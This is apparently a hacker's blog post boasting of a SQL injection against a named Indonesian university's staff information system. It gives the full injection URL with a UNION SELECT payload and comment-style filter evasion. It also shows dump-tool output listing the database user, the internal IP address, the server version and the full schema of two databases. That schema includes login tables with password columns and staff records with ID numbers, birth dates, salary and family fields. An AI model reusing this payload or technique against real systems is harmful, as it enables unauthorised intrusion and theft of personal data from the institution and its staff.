Desc: Another SQL vulnerability in one of university in Indonesia. This vulnerability can be used to hack the other subdomain which is the most important part of information system in this university :)
[+] URL:http://simpeg.unnes.ac.id/?j=AjE%2F5SsJNnUwS2hJvjviSOO8cFCgbE%2BAUT0dxq8ecX8SWl0MJcb4cOswBy4xzjeD&id=7'/**/AND/**/1=2/**/UNION/**/SELECT/**/darkc0de,1,2,3,4,5,6,7,8/*
[+] Evasion Used: "/**/" "/*"
[+] 20:03:20
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: simpeg
User: usrsimpeg_new@192.168.108.7
Version: 5.0.18-Max-log
[Database]: sikadu_unnes
[Table: Columns]
[0]pemakai: usernm,passwrd,email,namafull,status,login,waktu,ip,server,aktivasi,creator,dari,createdate,kodeidentitas,updatedate,updater,ipupdate,serverupdate,kode,jur
[Database]: simpeg
[Table: Columns]
[0]FBS: nip,nama
[1]FE: nip,nama
[2]FIK: nip,nama
[3]FIP: nip,nama
[4]FIS: nip,nama
[5]FMIPA: nip,nama
[6]FT: nip,nama
[7]KatUser: KatUserID,GUser,IDGUser
[8]MSDOS: KDPTIMSDOS,KDJENMSDOS,KDPSTMSDOS,NOKTPMSDOS,NODOSMSDOS,NMDOSMSDOS,GELARMSDOS,TPLHRMSDOS,TGLHRMSDOS,KDJEKMSDOS,KDJANMSDOS,KDPDAMSDOS,KDSTAMSDOS,STDOSMSDOS,MLSEMMSDOS,STKATMSDOS,SRTIJMSDOS,NIPNSMSDOS,PTINDMSDOS,NIDNNMSDOS,SMAWLMSDOS,NODOS_
[9]PANGAN: Nip,nama
[10]PGSDD2: nip,nama
[11]PGSDD4: nip,nama
[12]PUSAT: NIP,Nama
[13]agama: kode,nama
[14]bag_menu: kodebag,nmbagmenu
[15]buku: id,nip,judul_buku,penerbit,kota,tahun,isbn,penulis_2,penulis_3,penulis_4
[16]catatan: ip,server,user,kegiatan,waktu,id
[17]counter: waktu,jumlah
[18]doskar: kode_eselon,nip,nipmstr,gaji_aktiv,kodemstr,kode,kode_dos,kode_dos_nas,no_ktp,kode_fungs,no_seri,dos_kar,kbk,gelar_depan,gelar_belakang,nama,status,status_krj,lahir_tmp,lahir_tgl,jln,kode_pos,kab,prop,lain,gol,ruang,jab_ak,tmt_gol_skrg,tmt_jab_skrg,kawin,agama,jab_struk,sex,tmt_cpns,tmt_pns,golru_capeg,ket,jiwa,jml_anak,telp,telp_rumah,foto,gapok,kosong,ket1,ket2,s1,jur_s1,th_s1,s2,jur_s2,th_s2,s3,jur_s3,th_s3,nama_is_sua,pek,goldar,mkpok,email,kodejab,anak1,lahir_anak1,anak2,lahir_anak2,anak3,lahir_anak3,anak4,lahir_anak4,anak5,lahir_anak5,lahir_is_sua,ids,editor,timeedit,ip,serverip,nikah_tgl,masakerjagol,masakerjatot,hutang,potlain,sewarum,simjib,mk_ajar,karya_monumental,prop_lahir,rumpun_ilmu,tgl_mulai_dos,prodi,alamat_prodi,telp_kantor
[19]doskar2: kode_eselon,nip,nipmstr,gaji_aktiv,kodemstr,kode,kode_dos,kode_dos_nas,no_ktp,kode_fungs,no_seri,dos_kar,kbk,gelar_depan,gelar_belakang,nama,status,status_krj,lahir_tmp,lahir_tgl,jln,kode_pos,kab,prop,lain,gol,ruang,jab_ak,tmt_gol_skrg,tmt_jab_skrg,kawin,agama,jab_struk,sex,tmt_cpns,tmt_pns,golru_capeg,ket,jiwa,jml_anak,telp,telp_rumah,foto,gapok,kosong,ket1,ket2,s1,jur_s1,th_s1,s2,jur_s2,th_s2,s3,jur_s3,th_s3,nama_is_sua,pek,goldar,mkpok,email,kodejab,anak1,lahir_anak1,anak2,lahir_anak2,anak3,lahir_anak3,anak4,lahir_anak4,anak5,lahir_anak5,lahir_is_sua,ids,editor,timeedit,ip,serverip,nikah_tgl,masakerjagol,masakerjatot,hutang,potlain,sewarum,simjib
[20]doskar_old: kode_eselon,nip,nipmstr,gaji_aktiv,kodemstr,kode,kode_dos,kode_dos_nas,no_ktp,kode_fungs,no_seri,dos_kar,kbk,gelar_depan,gelar_belakang,nama,status,status_krj,lahir_tmp,lahir_tgl,jln,kode_pos,kab,prop,lain,gol,ruang,jab_ak,tmt_gol_skrg,tmt_jab_skrg,kawin,agama,jab_struk,sex,tmt_cpns,tmt_pns,golru_capeg,ket,jiwa,jml_anak,telp,telp_rumah,foto,gapok,kosong,ket1,ket2,s1,jur_s1,th_s1,s2,jur_s2,th_s2,s3,jur_s3,th_s3,nama_is_sua,pek,goldar,mkpok,email,kodejab,anak1,lahir_anak1,anak2,lahir_anak2,anak3,lahir_anak3,anak4,lahir_anak4,anak5,lahir_anak5,lahir_is_sua,ids,editor,timeedit,ip,serverip,nikah_tgl,masakerjagol,masakerjatot,hutang,potlain,sewarum,simjib,mk_ajar,karya_monumental,prop_lahir,rumpun_ilmu,tgl_mulai_dos
[21]doskar_tmp: nip,kode,kode_fungs,no_ktp,gelar_depan,gelar_belakang,nama,status,lahir_tmp,lahir_tgl,jln,kode_pos,kab,prop,lain,gol,ruang,jab_ak,kawin,agama,jab_struk,sex,ket,telp,telp_rumah,ket1,ket2,s1,jur_s1,th_s1,s2,jur_s2,th_s2,s3,jur_s3,th_s3,nama_is_sua,mkpok,email,prop_lahir,karya_monumental,pakai
[22]eselon: kodees,namaes,tunjanganes
[23]fakultas: id,kode_fak,nama_fak,singk_nama
[24]fungsional: kodefg,namafg,tunjanganfg
[25]hasil_deskripsi_diri: no_peserta,A,B,C,D,E,F,G,H,I,J,K
[26]instrumen_persepsi: no,bagian,user,tulisan
[27]jabatan: id,nip,jenis_jabatan,nama_jabatan,th_mulai,th_selesai
[28]judul_deskripsi_diri: kode,bagian,judul
[29]karya_dosen: id,nip,jur,jenis,program,status,judul,tim1,tim2,tim3,tim4,tim5,lain,dana,sumber,novol,hal_jurnal,jurnal,standar_jurnal,tahun,ISBN,nama_sem,standar,peran_seminar,tgl_sem,nama_lat,jangka_lat,peny_lat,awal_lat,akhir_lat,np,nf,tf,sf,content,jangka_lit,tahun_akhir_lit
[30]master_serdos: no_peserta,nip,ptp_serdos
[31]menu: id,nm_menu,desc,target,icon,tampil,admin,operator,dosen,karyawan,pejabat,pejabat2
[32]menuatas: id,nm_menu,desc,target,admin,operator,dosen,karyawan,pejabat,umum
[33]menuku: kat_menu,kbagmenu,nm_menu,link,ket_menu,id,aktv
[34]nilai_persepsional: no_peserta,user,pengisi,skor_1,skor_2,skor_3,skor_4,skor_5,skor_6,skor_7,skor_8,skor_9,skor_10,skor_11,skor_12,skor_13,skor_14,skor_15,skor_16,skor_17,skor_18,skor_19,skor_20,skor_21,skor_22,skor_23,skor_24,skor_25,skor_26,skor_27,skor_28,verifikasi,tgl_verifikasi
[35]nipfinal: urut,nip,urut2
[36]online: sessionID,secureCode,ip,mulai,expired,username,login
[37]pangkat: kodepangk,namapangk,golrupangk
[38]pemakai: id,usernm,passwrd,namafull,status,login,waktu,ip,server,aktivasi,creator,createdate,dari,kdpmk,updatedate,updater,ipupdate,serverupdate
[39]penilai_mhs_masalah: no_peserta,status,penilai
[40]prestasi: id,nip,kategori,prestasi,tahun
[41]riwayat_jabatan_fungsional: id,nip,fungsional,nomor_sk,tgl_sk,tmt,kum,kum_lebih
[42]riwayat_pangkat: id,nip,pangkat,nomor_sk,tgl_sk,tmt,masa_kerja_th,masa_kerja_bln
[43]riwayat_sekolah: id,nip,jenjang_sekolah,nama_sekolah,jurusan,lulus,tempat_studi,prodi,kota,negara,gelar,file_ijazah,size_ijazah,judul_ta
[44]rumpun_ilmu: kode,rumpun
[45]serdos_kode_pt: kode,nama
[46]serdos_master: no_peserta,nama,gelar_depan,gelar_belakang,kelamin,jabatan_akademik,pangkat,nip,alamat_rmh,telp_rmh,tempat_lahir,tgl_lahir,institusi,jurusan,mata_kuliah,tmmd,s1,s2,s3,karya,ptp_serdos,nta,persepsional,person,gab_pak,konsistensi,hasil_akhir,alasan_tdk_lulus,asesor_1,asesor_2
[47]serdos_penilai_persepsi: no_peserta,status,penilai
[48]serdos_user: usernm,passwrd,namafull,status,login,waktu,ip,server,aktivasi,creator,createdate,dari,updatedate,updater,ipupdate,serverupdate,tipe_authentikasi
[49]tagama: kodeagama,namaagama
[50]tberita: id,judul,isiberita,penulis,tanggal,waktu,counter,file_attach,desk_file
[51]tdownload: idfile,judul,pengirim,waktu,tanggal,file,size,tipe,tmp_name,hits
[52]tgolongan: kodegol,namagol
[53]tlink: id,alamat,desc,namalink
[54]tpengunjung: timestamp,ip,file,usernm
[55]tpropinsi: kodeprop,namaprop
[56]trekap: id,nama_menu,target,icon,tampil
[57]truang_peg: koderuang_peg,namaruang
[58]tsex: kodesex,namasex
[59]tstatus_kawin: kodekawin,namastatuskawin
[60]tstatus_peg: kodepeg,namapeg
[61]user: usernm,passwrd,namafull,status,login,waktu,ip,server,aktivasi,creator,createdate,dari,kdpmk,updatedate,updater,ipupdate,serverupdate
[-] [20:26:05]
[-] Total URL Requests 739
[-] Done
0 comments:
Post a Comment